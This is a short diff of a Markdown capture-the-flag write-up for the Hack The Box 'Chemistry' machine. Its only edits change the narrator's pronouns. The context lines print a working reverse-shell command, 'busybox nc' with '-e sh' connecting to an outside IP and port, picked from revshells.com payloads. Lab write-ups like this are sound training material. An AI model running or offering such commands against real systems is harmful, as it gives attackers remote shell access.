Fra-kX0x5B/CTF-Writeups/Chemistry - HTB - Easy/Chemistry-WriteUp.md

 >

 <br><br>

-Experimenting with an active handler and a series of bash payloads from https://www.revshells.com/, we find the right one to be:
+Experimenting with an active handler and a series of bash payloads from https://www.revshells.com/, i find the right one to be:

 <br><br>

 > *busybox nc 10.10.15.56 1337 -e sh*

 <br><br>

-Which allows us to gain a reverse shell:
+Which allows me to gain a reverse shell:

 <br><br>